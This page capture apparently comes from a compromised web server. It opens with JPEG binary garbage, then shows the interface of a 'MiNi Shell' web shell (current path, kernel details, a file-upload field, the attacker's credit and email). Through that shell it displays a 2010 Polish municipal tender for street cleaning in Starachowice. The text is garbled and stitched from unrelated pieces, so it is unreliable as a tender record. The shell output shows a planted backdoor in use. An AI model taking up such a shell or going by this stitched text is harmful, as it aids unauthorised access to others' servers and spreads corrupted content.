JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100127/23730-N-2010.html

<p class="kh_header"><b>Starachowice: Oczyszczanie ulic, placów i innych terenów w mieście Starachowice w 2010 r</b><br>
<b>Numer ogłoszenia: 23730 - 2010; data zamieszczenia: 27.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Starachowice , ul. Radomska 45, 27-200 Starachowice, woj. świętokrzyskie, tel. 41 273 82 75, faks 41 273 82 75.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.um.starachowice.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Oczyszczanie ulic, placów i innych terenów w mieście Starachowice w 2010 r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług komunalnych polegających na oczyszczaniu ulic, chodników, placów, terenów zieleni miejskiej i innych w tym likwidacja dzikich wysypisk śmieci oraz realizacji usług powiązanych z utrzymaniem czystości i porządku na terenie miasta Starachowice (prace sanitarno-porządkowe) poprzez: 
1)	organizację w Starachowicach biura - punktu kontaktowego (punktu zgłoszeniowego itp.) wyposażonego w telefon stacjonarny. Osoby odpowiedzialne za organizację i nadzór na wykonywanymi pracami winny być wyposażone w telefony komórkowe,
2)	załadunek, transport i unieszkodliwienie odpadów powstałych na skutek realizowanych prac sanitarno-porządkowych, w instalacjach unieszkodliwiających odpady komunalne poza granicami miasta Starachowice, 
3)	wykonywanie zadań z zakresu:
a)	oczyszczania miasta:
codzienne (od poniedziałku do soboty) bieżące zbieranie śmieci i innych zanieczyszczeń w obrębie obszarów określonych Załącznikiem nr 1 do SIWZ (pasy drogowe, chodniki, ciągi piesze, tereny zieleni miejskiej, pomniki) stanowiącym integralną część umowy, dalej nazywany Załącznikiem,
codzienne (od poniedziałku do soboty) bieżące usuwanie z jezdni, chodników i ciągów pieszych odpadów i innych zanieczyszczeń (w tym opadłych liści) zagrażających bezpieczeństwu ludzi i ruchu drogowego,
doraźne zbieranie śmieci i innych zanieczyszczeń (Piachy, Lubianka, Na Szlakowisku i inne tereny przed i po imprezach miejskich),
terminowe letnie czyszczenie (od kwietnia do listopada) zgodnie z ustalonymi przez Zamawiającego  zasadami i harmonogramem (Załącznik nr 1 do SIWZ) ręczne, mechaniczne (przy użyciu zamiatarki), chemiczne dróg (pasów drogowych), placów, chodników, ciągów pieszych oraz przyległych do nich terenów,
usuwanie traw, chwastów, mchów z jezdni, placów, chodników,  ciągów pieszych,
usuwanie skutków burz, anomalii pogodowych, awarii i wypadków itp. na terenach gminnych lub spowodowanych przez obiekty, infrastrukturę itp. należące do Gminy Starachowice,
zimowe utrzymanie wskazanych przez Zamawiającego terenów gminnych ( w tym zablokowanych przejść dla pieszych) o powierzchni około 1000m2, odsłanianie kratek ściekowych,
likwidacja dzikich wysypisk śmieci w tym również zlokalizowanych w rejonie altan śmietnikowych o łącznej kubaturze 400 m3,
oczyszczanie innych terenów miasta o łącznej powierzchni około 2 ha/miesiąc, wskazanych przez Zamawiającego,
b)	utrzymania obiektów małej architektury:
mocowanie tablic z nazwami ulic,
dekoracja miasta flagami przed świętami narodowymi i lokalnymi - flagi zapewnia Zamawiający,
utrzymanie pomników i obelisków (Załącznik nr 1 do SIWZ).
c)	utrzymania i konserwacji zieleni miejskiej:
koszenie traw, chwastów i samosiejek na terenach gminnych (w tym pobocza dróg gminnych) o powierzchni około 10 ha nie włączonych do systematycznego koszenia przez firmę zajmującą się koszeniem terenów zieleni miejskiej, wyłonioną w drodze przetargu nieograniczonego,
odchwaszczanie ręczne lub chemiczne żywopłotów o długości około 9 km,
grabienie wiosenne, odchwaszczanie trawników, zbieranie śmieci oraz jesienne wygrabywanie i sprzątanie liści (w listopadzie - grudniu) na terenach zieleni miejskiej o powierzchni około 20 ha),
nasadzenie drzew i krzewów (dostarczonych przez Zamawiającego) wraz z palikowaniem (do 100 szt.),
interwencyjna obcinka gałęzi i wycinka drzew (kilkadziesiąt sztuk) i krzewów łatwodostępnych na terenach gminnych,
obcinanie gałęzi, odrostów oraz formowanie lub wycinanie krzewów w pasie drogowym -powierzchnia około 1000m2,
d)	opieki nad grobami i cmentarzami wojennymi:
sprzątanie grobów i pomników co najmniej 4 razy w roku.
e)	bieżącego utrzymania infrastruktury drogowej gminnej:
usuwanie masą bitumiczną na zimno ubytków w nawierzchni dróg,  przy użyciu materiału Zamawiającego,
koszenie traw w pasie drogowym,
f)	odprowadzenia wód opadowych:
czyszczenie wpustów kanalizacji deszczowej na terenach gminnych,
bieżąca konserwacja piaskowników i wylotów kanalizacji deszczowej wycinanie samosiejek, koszenie traw i chwastów, zbieranie śmieci i osadów, naprawa ogrodzenia,
g)	wykonywania innych drobnych usług z zakresu prac sanitarno-porządkowych,
h)	transport komunalny samochodami ciężarowymi do 5 ton: 
transport komunalny w związku z utrzymaniem czystości i porządku na terenie Miasta Starachowice, samochodami ciężarowymi do 5 ton, według dyspozycji Zamawiającego - do 300 godzin.
Rozliczenie z realizacji usług określonych w pkt 1 i 2 oraz pkt 3 lit. a) - g) następować będzie w formie comiesięcznego wynagrodzenia ryczałtowego, zaś usługi określonej w pkt 3 lit. h) na podstawie wpisu czasu pracy w karcie najmu pojazdu przez osobę upoważnioną i ofertowej ceny jednostkowej.
Prace sanitarno- porządkowe realizowane są na następujących terenach:
drogi gminne I kategoria sprzątania - 24,9 km
drogi gminne II kategoria sprzątania - 34,0 km
drogi gminne III kategoria sprzątania - 54,4 km
chodniki II kategoria sprzątania - 30,4 km
wybrane ciągi piesze I kategoria sprzątania - 9.298 m2
wybrane ciągi piesze II kategoria sprzątania - 13.551 m2
pomniki II kategoria sprzątania - 11 obiektów
trawniki, trawy, zielone skarpy - około 48 ha
tereny parkowe - około 18 ha
inne tereny i infrastruktura należąca do Gminy Starachowice, których utrzymanie realizowana jest okazjonalnie według dyspozycji zamawiającego

Terminowe letnie (od kwietnia do listopada) czyszczenie dróg, placów, chodników, ciągów pieszych i przyległych do nich terenów odbywa się po wykonaniu pozimowego sprzątania przez firmy świadczące usługi zimowego utrzymania miasta w sposób następujący:
terminowe wykonywanie prac sanitarno-porządkowych zgodnie z podziałem na I, II i III kategorię sprzątania (Załączniki nr 1 do SIWZ), obejmujące gruntowne (ręczne, mechaniczne i chemiczne); oczyszczenie z ziemi, piasku, liści, chwastów, traw i innych,  powierzchni  pasów drogowych (jezdnia, chodnik, zieleń pobocza), parkingów, zatok i placów  leżących  wzdłuż  krawężników  lub krawędzi  powierzchni utwardzonych, a także oczyszczanie powierzchni wskazanych chodników i ciągów pieszych, pomników, obelisków znajdujących się poza pasami drogowymi dróg gminnych; obcinanie gałęzi, odrostów oraz formowanie lub wycinanie krzewów zagrażających bezpieczeństwa ruchu drogowego, usuwanie chwastów z pasów zieleni, poboczy.
bieżące utrzymanie czystości i porządku poprzez zbieranie śmieci i innych zanieczyszczeń (w tym liści) a także likwidacja  zanieczyszczeń powstałych  na  skutek  działania  zdarzeń losowych (np. burza, grad, wiatr, wypadki drogowe, awarie itp.) wskazanych  przez  Zleceniodawcę  i  zlokalizowanych  samodzielnie przez Wykonawcę.
Pozostałe prace sanitarno-porządkowe realizowane są w miarę potrzeb zgodnie z dyspozycjami Zamawiającego.
Kategorie sprzątania:
I kategoria - Wykonywanie prac sanitarno - porządkowych w obrębie utrzymywanych terenów po zrealizowaniu pozimowego sprzątania przez firmy świadczące usługi zimowego utrzymania miasta; od kwietnia do listopada dwa razy w miesiącu (średnio w odstępie czasowym co 12 - 18 dni);
II kategoria - Wykonywanie prac sanitarno - porządkowych w obrębie utrzymywanych terenów po zrealizowaniu pozimowego sprzątania przez firmy świadczące usługi zimowego utrzymania miasta; od kwietnia do listopada jeden raz w miesiącu (średnio w odstępie czasowym co 25 - 35 dni);
III kategoria - Wykonywanie prac sanitarno - porządkowych w obrębie utrzymywanych terenów po zrealizowaniu pozimowego sprzątania przez firmy świadczące usługi zimowego utrzymania miasta; od kwietnia do listopada średnio co dwa miesiące (średnio w odstępie czasowym co 55 - 65 dni) z obowiązkiem wykonania pierwszego sprzątania w okresie:15.04. - 15.05.2010r..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający zgodnie z art. 45 ust. 2 ustawy Pzp, żąda wniesienia wadium. Wadium może być wnoszone w jednej lub kilku następujących formach:
pieniądzu,
poręczeniach bankowych,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz.596 i Nr 216, poz. 1824).

Wadium w wysokości : 10 000,00 zł	
1.	w pieniądzu - przelewem na konto nr 17102026740000210200033225 Bank PKO BP SA o/Ostrowiec Św., tytułem: WADIUM na przetarg Oczyszczanie ulic, placów i innych terenów w mieście Starachowice w 2010 r. - z takim wyliczeniem, aby wpłynęło na rachunek Zamawiającego najpóźniej w terminie złożenia oferty (wniesienie wadium przelewem oznacza uznanie kwoty wadium przez rachunek Zamawiającego);
2.	w innych formach - w terminie składania oferty. Oryginał dokumentu zdeponować w kasie 
(w kopercie zaadresowanej na Urząd Miejski, Kasa ul. Radomska 45, 27-200 Starachowice, z dopiskiem WADIUM na przetarg Zimowe i letnie utrzymanie terenów osiedlowych stanowiących zasób Gminy Starachowice, kopię dokumentu dołączyć do oferty).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24. ust. 1 Prawa zamówień publicznych, oraz którzy spełniają warunki dotyczące:
1.posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2.	posiadania wiedzy i doświadczenia;
3.	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4.	sytuacji ekonomicznej i finansowej.
II.Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie zawartych w ofercie oświadczeń i dokumentów wymaganych w pkt 7 SIWZ - wg formuły spełnia - nie spełnia. Wykonawcy muszą spełnić określone warunki:
1.posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
w przypadku składania oferty przez wykonawców występujących wspólnie ww. warunek musi spełnić każdy z wykonawców.
2.posiadanie wiedzy i doświadczenia - wymagane jest wykazanie w okresie ostatnich trzech lat minimum 1 usługi z zakresu usług komunalnych lub transportowych, odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia. Za usługi odpowiadające przedmiotowi zamówienia Zamawiający uzna wykonanie co najmniej jednego zamówienia w zakresie usługi komunalnej lub transportowej, o łącznej wartości nie mniejszej niż 400 000
zł (brutto).
w przypadku składania oferty przez wykonawców występujących wspólnie ww. warunek musi spełnić co najmniej jeden z wykonawców.
3.	dysponowanie odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. W zakresie potencjału technicznego wymagane jest dysponowanie:
dopuszczonymi do ruchu drogowego co najmniej dwoma samochodami samowyładowczymi (wyposażonymi w urządzenia wysyłające żółte sygnały świetlne; siatki lub plandeki do zabezpieczania przewożonego ładunku przed wysypaniem) o uchylnych burtach, przystosowanymi do przewozu każdy około 5 ton ładunku,
co najmniej jedną zamiatarką mechaniczną.
w przypadku składania oferty przez wykonawców występujących wspólnie ww. warunek musi spełnić co najmniej jeden z wykonawców.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy z postępowania zgodnie z art. 24 ust. 2 ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu określonych w art. 22 ust. 1 oraz w art. 24 ust. 1, wykonawca składa oświadczenie zawarte w formularzu OFERTA.
1.	Zamawiający w celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Prawa Zamówień Publicznych, żąda załączenia do oferty:
a)	aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1pkt 2 ustawy. 
W przypadku składania oferty przez wykonawców występujących wspólnie ww. dokument musi być złożony przez każdego wykonawcę.
2.	Zamawiający w celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie, żąda załączenia do oferty: 
a)	wykazu wykonanych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - sporządzonego wg załącznika - DOŚWIADCZENIE ZAWODOWE
Wymagane jest  wykazanie w okresie ostatnich trzech lat minimum 1 usługi z zakresu usług komunalnych lub transportowych, odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia. Za usługi odpowiadające przedmiotowi zamówienia Zamawiający uzna wykonanie co najmniej jednego zamówienia w zakresie usługi komunalnej lub transportowej, o łącznej wartości nie mniejszej niż 400 000 zł (brutto).
Do wykazu należy załączyć dokumenty potwierdzające, że wykazane usługi zostały wykonane należycie (np. referencje).
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, ww. warunek mogą spełniać łącznie. 
3.	Zamawiający w celu potwierdzenia, że wykonawca dysponuje odpowiednim potencjałem technicznym żąda załączenia do oferty:
a)	wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami.
 Wymagane jest dysponowanie:
dopuszczonymi do ruchu drogowego co najmniej dwoma  samochodami samowyładowczymi (wyposażonymi w urządzenia wysyłające żółte sygnały świetlne; siatki lub plandeki do zabezpieczania przewożonego ładunku przed wysypaniem) o uchylnych burtach,  przystosowanymi do przewozu każdy około 5 ton ładunku,
co najmniej jedną zamiatarką mechaniczną.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, ww. warunek mogą spełniać łącznie.
4.	Jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów zamawiający żąda od wykonawcy przedstawienia pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.um.starachowice.pl/public/?id=85863.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Referat Zamówień Publicznych (pok. 111) ul. Radomska 45
27- 200 Starachowice.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2010 godzina 10:30, miejsce: Urząd Miejski Biuro Obsługi Mieszkańców (parter) ul. Radomska 45 27-200 Starachowice.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com